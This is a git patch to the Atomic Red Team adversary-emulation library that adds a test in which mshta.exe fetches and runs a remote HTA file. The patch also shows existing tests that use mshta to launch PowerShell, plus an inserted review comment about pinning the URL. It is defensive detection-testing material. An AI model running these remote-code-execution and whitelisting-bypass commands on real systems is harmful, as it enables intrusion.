From 26e0f443b975bd84b80b4de9f415f6cbd1cce0fa Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Mon, 11 Nov 2019 08:45:07 -0600 Subject: [PATCH] T1170 remote hta (#633) * T1170 Remote HTA test * Generate docs from job=validate_atomics_generate_docs branch=t1170-remote-hta --- atomics/T1170/T1170.hta | 12 ++++++++++++ atomics/T1170/T1170.md | 23 +++++++++++++++++++++++ atomics/T1170/T1170.yaml | 18 +++++++++++++++++- atomics/index.md | 2 ++ atomics/index.yaml | 36 ++++++++++++++++++++++++++++++++++-- atomics/windows-index.md | 2 ++ 6 files changed, 90 insertions(+), 3 deletions(-) create mode 100644 atomics/T1170/T1170.hta diff --git a/atomics/T1170/T1170.hta b/atomics/T1170/T1170.hta new file mode 100644 index 00000000..59101b61 --- /dev/null +++ b/atomics/T1170/T1170.hta @@ -0,0 +1,12 @@ + + + + + + + + + \ No newline at end of file diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md index b90a6ac2..07e032d7 100644 --- a/atomics/T1170/T1170.md +++ b/atomics/T1170/T1170.md @@ -18,6 +18,8 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a - [Atomic Test #3 - Mshta executes VBScript to execute malicious command](#atomic-test-3---mshta-executes-vbscript-to-execute-malicious-command) +- [Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-4---mshta-executes-remote-html-application-hta) +
@@ -82,4 +84,25 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit +
+
+
+## Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)
+Execute an arbitrary remote HTA.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta|
+
+#### Run it with `command_prompt`!
+```
+mshta #{hta_url}
+```
+
+
+
diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 81ad4b11..5c77f4cd 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -51,4 +51,20 @@ atomic_tests:
 executor:
 name: command_prompt
 command: |
- mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
\ No newline at end of file
+ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+- name: Mshta Executes Remote HTML Application (HTA)
+ description: |
+ Execute an arbitrary remote HTA.
+
+ supported_platforms:
+ - windows
+ input_arguments:
+ hta_url:
+ description: URL to HTA file for execution
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+ executor:
+ name: command_prompt
+ command: |
+ mshta #{hta_url}
\ No newline at end of file
diff --git a/atomics/index.md b/atomics/index.md
index 0d20e9d0..52300ebb 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -300,6 +300,7 @@
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
 - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
 - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+ - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
 - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
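Review bot: The default `hta_url` of the new test tracks `master`, so `mshta #{hta_url}` executes whatever `atomics/T1170/T1170.hta` holds at run time rather than the file reviewed in this patch; pin the default to a specific commit of the repository instead of a branch (`default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<commit>/atomics/T1170/T1170.hta`), or at minimum state in the description that the test downloads and runs live content over the network. The description `Execute an arbitrary remote HTA.` also gives the operator nothing to validate against: the HTA body is not legible in this patch view, but the description should name the process or observable effect the default HTA produces so a detection engineer knows what mshta.exe is expected to spawn. Finally, `hta_url` is interpolated straight into a command line; that is standard for atomics, but a reminder that the URL is trusted input would belong in the argument description. The trailing-newline fix on the preceding test is fine.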
@@ -682,6 +683,7 @@
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
 - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
 - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+ - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
 - Atomic Test #1: Mimikatz [windows]
 - Atomic Test #2: BloodHound [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 4e1bd378..02954daf 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -8913,7 +8913,23 @@ defense-evasion:
 executor:
 name: command_prompt
 command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
- -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")'
+ -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+'
+ - name: Mshta Executes Remote HTML Application (HTA)
+ description: 'Execute an arbitrary remote HTA.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ hta_url:
+ description: URL to HTA file for execution
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+ executor:
+ name: command_prompt
+ command: 'mshta #{hta_url}'
 T1096:
 technique:
 x_mitre_data_sources:
@@ -19406,7 +19422,23 @@ execution:
 executor:
 name: command_prompt
 command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
- -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")'
+ -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+'
+ - name: Mshta Executes Remote HTML Application (HTA)
+ description: 'Execute an arbitrary remote HTA.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ hta_url:
+ description: URL to HTA file for execution
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+ executor:
+ name: command_prompt
+ command: 'mshta #{hta_url}'
 T1086:
 technique:
 x_mitre_permissions_required:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 3a35379e..1f5dcc1a 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -100,6 +100,7 @@
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
 - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
 - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+ - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
 - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -544,6 +545,7 @@
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
 - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
 - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+ - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
 - Atomic Test #1: Mimikatz [windows]
 - Atomic Test #2: BloodHound [windows]